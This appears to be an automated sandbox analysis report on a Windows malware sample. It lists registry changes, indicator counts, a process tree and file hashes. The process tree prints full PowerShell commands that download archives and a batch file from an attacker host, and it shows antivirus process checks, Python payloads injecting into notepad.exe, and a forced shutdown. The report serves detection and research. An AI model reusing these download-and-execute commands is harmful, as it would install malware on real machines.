Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "309C 309C 30A1 30A1 30A2 30A2 30A3 30A3 30A4 30A4 30A5 30A5 30A6 30A6 30A7 30A7 30A8 30A8 30A9 30A9 30AA 30AA 30AB 30AB 30AC 30AC 30AD 30AD 30AE 30AE 30AF 30AF 30B0 30B0 30B1 30B1 30B2 30B2 30B3 30B3 30B4 30B4 30B5 30B5 30B6 30B6 30B7 30B7 30B8 30B8 30B9 30B9 30BA 30BA 30BB 30BB 30BC 30BC 30BD 30BD 30BE 30BE 30BF 30BF 30C0 30C0 30C1 30C1 30C2 30C2 30C3 30C3 30C4 30C4 30C5 30C5 30C6 30C6 30C7 30C7 30C8 30C8 30C9 30C9 30CA 30CA 30CB 30CB 30CC 30CC 30CD 30CD 30CE 30CE 30CF 30CF 30D0 30D0 30D1 30D1 30D2 30D2 30D3 30D3 30D4 30D4 30D5 30D5 30D6 30D6 30D7 30D7 30D8 30D8 30D9 30D9 30DA 30DA 30DB 30DB 30DC 30DC 30DD 30DD 30DE 30DE 30DF 30DF 30E0 30E0 30E1 30E1 30E2 30E2 30E3 30E3 30E4 30E4 30E5 30E5 30E6 30E6 30E7 30E7 30E8 30E8 30E9 30E9 30EA 30EA 30EB 30EB 30EC 30EC 30ED 30ED 30EE 30EE 30EF 30EF 30F0 30F0 30F1 30F1 30F2 30F2 30F3 30F3 30F4 30F4 30F5 30F5 30F6 30F6 30F7 30F7 30F8 30F8 30F9 30F9 30FA 30FA 30FB 30FB 30FC 30FC 30FD 30FD 30FE 30FE 0021 0021 0027 0027 002B 002B 002E 002E 003F 003F 005F 005F 007C 007C" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\fr-FR-N\\AI041036" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR ja-JP Lookup Lexicon" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "0" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "5223743" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "L1033" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "C0A" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Katja - German (Germany)" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\en-US-N\\L1033" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "L1036" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{179F3D56-1B0B-42B2-A962-59B7EF59FE1B}" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Sie haben %1 als Standardstimme ausgewählt." SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Male" SearchApp.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepython.exepython.exepython.exepython.exepython.exepython.exenotepad.exepython.exenotepad.exepowershell.exenotepad.exepowershell.exepid process 320 powershell.exe 320 powershell.exe 3724 powershell.exe 3724 powershell.exe 3800 python.exe 2568 python.exe 3424 python.exe 3284 python.exe 4092 python.exe 2940 python.exe 4896 notepad.exe 3176 python.exe 1280 notepad.exe 3652 powershell.exe 3652 powershell.exe 1156 notepad.exe 3028 powershell.exe 3028 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
Processes:
python.exepython.exepython.exepython.exepython.exepython.exepython.exepid process 3800 python.exe 2568 python.exe 3424 python.exe 3284 python.exe 4092 python.exe 2940 python.exe 3176 python.exe -
Suspicious use of AdjustPrivilegeToken 18 IoCs
Processes:
tasklist.exetasklist.exepowershell.exepowershell.exenotepad.exenotepad.exenotepad.exenotepad.exenotepad.exenotepad.exepowershell.exenotepad.exepowershell.exesvchost.exeSearchApp.exedescription pid process Token: SeDebugPrivilege 4048 tasklist.exe Token: SeDebugPrivilege 5068 tasklist.exe Token: SeDebugPrivilege 320 powershell.exe Token: SeDebugPrivilege 3724 powershell.exe Token: SeDebugPrivilege 1616 notepad.exe Token: SeDebugPrivilege 2220 notepad.exe Token: SeDebugPrivilege 2200 notepad.exe Token: SeDebugPrivilege 4896 notepad.exe Token: SeDebugPrivilege 4524 notepad.exe Token: SeDebugPrivilege 1280 notepad.exe Token: SeDebugPrivilege 3652 powershell.exe Token: SeDebugPrivilege 1156 notepad.exe Token: SeDebugPrivilege 3028 powershell.exe Token: SeManageVolumePrivilege 1900 svchost.exe Token: SeDebugPrivilege 4852 SearchApp.exe Token: SeDebugPrivilege 4852 SearchApp.exe Token: SeDebugPrivilege 4852 SearchApp.exe Token: SeDebugPrivilege 4852 SearchApp.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
notepad.exenotepad.exenotepad.exeSearchApp.exepid process 4896 notepad.exe 1280 notepad.exe 1156 notepad.exe 4852 SearchApp.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepython.exedescription pid process target process PID 4588 wrote to memory of 4048 4588 cmd.exe tasklist.exe PID 4588 wrote to memory of 4048 4588 cmd.exe tasklist.exe PID 4588 wrote to memory of 1160 4588 cmd.exe find.exe PID 4588 wrote to memory of 1160 4588 cmd.exe find.exe PID 4588 wrote to memory of 5068 4588 cmd.exe tasklist.exe PID 4588 wrote to memory of 5068 4588 cmd.exe tasklist.exe PID 4588 wrote to memory of 1440 4588 cmd.exe find.exe PID 4588 wrote to memory of 1440 4588 cmd.exe find.exe PID 4588 wrote to memory of 320 4588 cmd.exe powershell.exe PID 4588 wrote to memory of 320 4588 cmd.exe powershell.exe PID 4588 wrote to memory of 3724 4588 cmd.exe powershell.exe PID 4588 wrote to memory of 3724 4588 cmd.exe powershell.exe PID 4588 wrote to memory of 3800 4588 cmd.exe python.exe PID 4588 wrote to memory of 3800 4588 cmd.exe python.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe PID 3800 wrote to memory of 1616 3800 python.exe notepad.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3580
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\new.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:4588 -
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq AvastUI.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4048
-
-
C:\Windows\system32\find.exefind /i "AvastUI.exe"3⤵PID:1160
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq avgui.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5068
-
-
C:\Windows\system32\find.exefind /i "avgui.exe"3⤵PID:1440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://partinvshipppjbb.click:7382/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "try { Expand-Archive -Path 'C:\Users\Admin\Downloads\downloaded.zip' -DestinationPath 'C:\Users\Admin\Downloads\Extracted' -Force } catch { exit 1 }"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3724
-
-
C:\Users\Admin\Downloads\Extracted\Python\Python312\python.exepython.exe ana.py3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of WriteProcessMemory
PID:3800
-
-
C:\Users\Admin\Downloads\Extracted\Python\Python312\python.exepython.exe asy.py3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:2568
-
-
C:\Users\Admin\Downloads\Extracted\Python\Python312\python.exepython.exe ven.py3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:3424
-
-
C:\Users\Admin\Downloads\Extracted\Python\Python312\python.exepython.exe hvn.py3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:3284
-
-
C:\Users\Admin\Downloads\Extracted\Python\Python312\python.exepython.exe xw3.py3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:4092
-
-
C:\Users\Admin\Downloads\Extracted\Python\Python312\python.exepython.exe xw5.py3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:2940
-
-
C:\Users\Admin\Downloads\Extracted\Python\Python312\python.exepython.exe ukk.py3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:3176
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://partinvshipppjbb.click:7382/startuppp.bat' -OutFile 'C:\Users\Admin\Downloads\startuppp.bat' }"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3652
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://partinvshipppjbb.click:7382/FTSP.zip' -OutFile 'C:\Users\Admin\Downloads\FTSP.zip' }"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3028
-
-
-
C:\Windows\System32\notepad.exeC:\Windows\System32\notepad.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1616
-
-
C:\Windows\System32\notepad.exeC:\Windows\System32\notepad.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
-
C:\Windows\System32\notepad.exeC:\Windows\System32\notepad.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2200
-
-
C:\Windows\System32\notepad.exeC:\Windows\System32\notepad.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4524
-
-
C:\Windows\System32\notepad.exeC:\Windows\System32\notepad.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4896
-
-
C:\Windows\System32\notepad.exeC:\Windows\System32\notepad.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1280
-
-
C:\Windows\System32\notepad.exeC:\Windows\System32\notepad.exe2⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1156 -
C:\Windows\System32\shutdown.exeshutdown.exe /f /s /t 03⤵PID:3596
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.Windows.Search_cw5n1h2txyewy1⤵PID:3524
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k UnistackSvcGroup1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4852
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy1⤵PID:2764
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa39c2055 /state1:0x41c64e6d1⤵PID:4372
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5ed30ca9187bf5593affb3dc9276309a6
SHA1c63757897a6c43a44102b221fe8dc36355e99359
SHA25681fc6cfe81caf86f84e1285cb854082ac5e127335b5946da154a73f7aa9c2122
SHA5121df4f44b207bb30fecee119a2f7f7ab7a0a0aed4d58eeabbec5791d5a6d9443cccffa5479ad4da094e6b88c871720d2e4bcf14ebec45a587ee4ec5e572f37810
-
Filesize
1KB
MD5b957d7d93866da390febf24c9fad2206
SHA108faeac0a3c1aaeb062805224f8e76307efb4fed
SHA256bef98bd806d1b16e0bad91e464f29f52aca7c5891640f3106042690d81e7775e
SHA512933df66e1f5b459dfb96aa3994a186bfcad1a9eef93e64507d23a15768ab71bb4988e18630fa51eb15c5c07d7c0e8018a551ec801901ca20a717f647733edccb
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\LCLWU0HG\microsoft.windows[1].xml
Filesize97B
MD52a1a81e3a88c48748e4f6dea19416bd4
SHA101542f154da58f93e6b8f6cd1eac71140c720170
SHA256574494fb9a6f0f17ac2e56ec90e781cb2c1b58a8c4b8cf0fd8a80c37e04c0e16
SHA5126a788fb0e04d4b1a7572983cfc5635aa0d6b7b5ee430079d6a075eda2098c48fbd56a5cf7329c87854f1c63f0465c6c144097bd89e4617b241fcf5c80c620196
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{5728f11f-3485-4903-aeec-f2f2dbb09564}\0.0.filtertrie.intermediate.txt
Filesize1KB
MD58609241ac301971b563b8864447f5fbc
SHA181b1e9382f7012f2441efcec40a5aabf46f34397
SHA25694d0c4ea1f705b557a8dd983931ecab83f4d19e691669f2723781d406d38a282
SHA512e536d2ae24ee17df34e28bcd1220f20901ec9b19a6f69b0c87f82a6535c813737681496927d9bea0b90e33b7c8236c77790a55d9a8514f5084ed3ad16d71c554
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{5728f11f-3485-4903-aeec-f2f2dbb09564}\0.1.filtertrie.intermediate.txt
Filesize5B
MD534bd1dfb9f72cf4f86e6df6da0a9e49a
SHA15f96d66f33c81c0b10df2128d3860e3cb7e89563
SHA2568e1e6a3d56796a245d0c7b0849548932fee803bbdb03f6e289495830e017f14c
SHA512e3787de7c4bc70ca62234d9a4cdc6bd665bffa66debe3851ee3e8e49e7498b9f1cbc01294bf5e9f75de13fb78d05879e82fa4b89ee45623fe5bf7ac7e48eda96
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{5728f11f-3485-4903-aeec-f2f2dbb09564}\0.2.filtertrie.intermediate.txt
Filesize5B
MD5c204e9faaf8565ad333828beff2d786e
SHA17d23864f5e2a12c1a5f93b555d2d3e7c8f78eec1
SHA256d65b6a3bf11a27a1ced1f7e98082246e40cf01289fd47fe4a5ed46c221f2f73f
SHA512e72f4f79a4ae2e5e40a41b322bc0408a6dec282f90e01e0a8aaedf9fb9d6f04a60f45a844595727539c1643328e9c1b989b90785271cc30a6550bbda6b1909f8
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{5728f11f-3485-4903-aeec-f2f2dbb09564}\Apps.ft
Filesize1KB
MD56c78adbcc2f3ba7a2ad306983176414c
SHA1484787d9aef671594b4d91b6c7d2d5c215f46260
SHA2568f2abe81c4d834b96b5e39b504949cd04aef23e290309b413f501b396efd381a
SHA51269bb126822ee7008d30135f7c216bf364e8e70ec5ca09cff58671d3c29081f467719bedb172cc14962aeeef22c34fb7e4c4a6aed26c26691a4cfef3816138c69
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{5728f11f-3485-4903-aeec-f2f2dbb09564}\Apps.index
Filesize879KB
MD55e4ec42046e35b20c1b8d97c17926572
SHA1d0f371a97b676240bd90f9fa1a0b14f97f9b1016
SHA2566a8c0c8cc58a866d0b874926f0ff1e2034a60bb18a2c584dd7f100be49c0febc
SHA512d8bc115f3e0632aa6df6d1ca949e53a5724eff26c9d42d90686df0aea777a00b6c3d1738adf7807c7c752f5f702c4bce1bee158d1f9e765a0148c960ea0113af
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{ec9862db-abfd-4be2-9d70-d28ab830ead2}\apps.csg
Filesize444B
MD55475132f1c603298967f332dc9ffb864
SHA14749174f29f34c7d75979c25f31d79774a49ea46
SHA2560b0af873ef116a51fc2a2329dc9102817ce923f32a989c7a6846b4329abd62cd
SHA51254433a284a6b7185c5f2131928b636d6850babebc09acc5ee6a747832f9e37945a60a7192f857a2f6b4dd20433ca38f24b8e438ba1424cc5c73f0aa2d8c946ff
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{ec9862db-abfd-4be2-9d70-d28ab830ead2}\apps.schema
Filesize150B
MD51659677c45c49a78f33551da43494005
SHA1ae588ef3c9ea7839be032ab4323e04bc260d9387
SHA2565af0fc2a0b5ccecdc04e54b3c60f28e3ff5c7d4e1809c6d7c8469f0567c090bb
SHA512740a1b6fd80508f29f0f080a8daddec802aabed467d8c5394468b0cf79d7628c1cb5b93cf69ed785999e8d4e2b0f86776b428d4fa0d1afcdf3cbf305615e5030
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{ec9862db-abfd-4be2-9d70-d28ab830ead2}\appsconversions.txt
Filesize1.4MB
MD52bef0e21ceb249ffb5f123c1e5bd0292
SHA186877a464a0739114e45242b9d427e368ebcc02c
SHA2568b9fae5ea9dd21c2313022e151788b276d995c8b9115ee46832b804a914e6307
SHA512f5b49f08b44a23f81198b6716195b868e76b2a23a388449356b73f8261107733f05baa027f8cdb8e469086a9869f4a64983c76da0dc978beb4ec1cb257532c6b
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{ec9862db-abfd-4be2-9d70-d28ab830ead2}\appsglobals.txt
Filesize343KB
MD5931b27b3ec2c5e9f29439fba87ec0dc9
SHA1dd5e78f004c55bbebcd1d66786efc5ca4575c9b4
SHA256541dfa71a3728424420f082023346365cca013af03629fd243b11d8762e3403e
SHA5124ba517f09d9ad15efd3db5a79747e42db53885d3af7ccc425d52c711a72e15d24648f8a38bc7e001b3b4cc2180996c6cac3949771aa1c278ca3eb7542eae23fd
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{ec9862db-abfd-4be2-9d70-d28ab830ead2}\appssynonyms.txt
Filesize237KB
MD506a69ad411292eca66697dc17898e653
SHA1fbdcfa0e1761ddcc43a0fb280bbcd2743ba8820d
SHA2562aa90f795a65f0e636154def7d84094af2e9a5f71b1b73f168a6ea23e74476d1
SHA512ceb4b102309dffb65804e3a0d54b8627fd88920f555b334c3eac56b13eeb5075222d794c3cdbc3cda8bf1658325fdecf6495334e2c89b5133c9a967ec0d15693
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133767477580472390.txt
Filesize3KB
MD56c7c5879f1c75b60ca6fe7048fdf88b6
SHA1e3faf0e19132003dfc8617a40933f760ec6b64c4
SHA2565391afca6e19b795f4790c36b762d967859b8dcab7f34f40cd3e9d02fb8ab74c
SHA51223a865f4b8d9b04b85d85c7e81a24ca6e28b12ad74acc9256ac564b437adeb0c64cb5fdfc723dde91f38a6c9363e63350791eba9d9217d67b9b387ea8ec209bb
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt
Filesize689KB
MD52dee0ab82c5db228dee2de2fe0d82eb3
SHA1c6231ad00bd775537fb422a86bfe2b5754e9b91d
SHA2560e01a47917642eac553b6d0feb6e97b398f7af84c5ffc74ba35ca66d7a341d39
SHA512c46ae09aab1f240ba384044ef46240a4cb02b6144b0403d690ff7ddcf79acc67da345c98254ef5436a4008fb419c889af43489fedf86e8ba822128365f30763f
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat
Filesize2KB
MD5811d11cd22b29c71c67f2948778d2a20
SHA1e8d0c088e050cf5e917bdffd9e3883445a3f48b8
SHA2560c9081643dee6e9a6cd3561fdeba820beee7da794d00dd07352474025b0b3532
SHA512aa1a8e67a5925213c94bbb96a8f3589aa3538305c6217adf288db68b4b3a2238ef53a3ef39d91ab9af8687f5581d6910eeb48d16909046dcd02e46f18e6797ee
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
122KB
MD5bbd5533fc875a4a075097a7c6aba865e
SHA1ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00
SHA256be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570
